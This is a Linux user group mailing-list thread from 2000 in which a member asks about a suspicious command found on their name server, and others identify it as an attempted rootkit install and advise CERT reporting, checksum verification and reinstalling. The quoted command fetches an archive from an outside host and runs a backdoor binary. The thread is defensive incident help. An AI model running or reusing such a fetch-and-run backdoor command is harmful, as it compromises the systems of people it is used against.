[lug] What does this mean?
Cory Dekker
cory at sysmgrs.com
Tue Mar 21 00:10:31 MST 2000
You should also probably file a CERT incident, especially with respect
to linux7.europop.de, so that it is either recognized as a hacker box (not
likely) or the System Admin can be notified that their box has probably
been comprimised (highly likely).
-Cory
Tkil wrote:
> >>>>> "Shannon" == nunar <nunar at mauromedia.net> writes:
>
> [reformatted for sanity]
>
> Shannon> I was going through my name server and somebody had entered this:
> Shannon> # cd /tmp; \
> Shannon> rcp disaus at linux7.europop.de:/dev/sdd0 ak.tgz; \
> Shannon> echo "* downloaded "; \
> Shannon> tar xfz ak*; \
> Shannon> cd ak; \
> Shannon> ./backdoor/ls; \
> Shannon> cd ..; \
> Shannon> rm -rf ak*; \
> Shannon> exit
>
> note that the only line which actually looks dangerous is the
> "./backdoor/ls" one; everything else should be pretty polite.
> (although, if they already have root... ouch.)
>
> Shannon> Does anybody know what this is doing to my system?
>
> short version: someone tried to run a rootkit against your box. i
> can't tell offhand whether or not they succeeded, but you should
> probably "rm -rf /tmp/backup" at the very least.
>
> jafo says: if you are running redhat, check the MD5 sums of all the
> packages on the box (this is an option to 'rpm'; consult the man page,
> but"--verify" should be close...)
>
> jafo also says: consult the most excellent linux security howto. (hi
> kev!) accessable at:
>
> http://www.tummy.com/security-howto/
>
> prepare to do a backup of important data (e.g. your named config
> files) and possibly do a full reinstall. be absolutely sure you are
> running the latest versions of named and friends (BIND-*). also,
> don't do a blind copy of the named config files; double-check that
> nobody is using your server who shouldn't be.
>
> t.
>
> _______________________________________________
> Web Page: http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
More information about the LUG
mailing list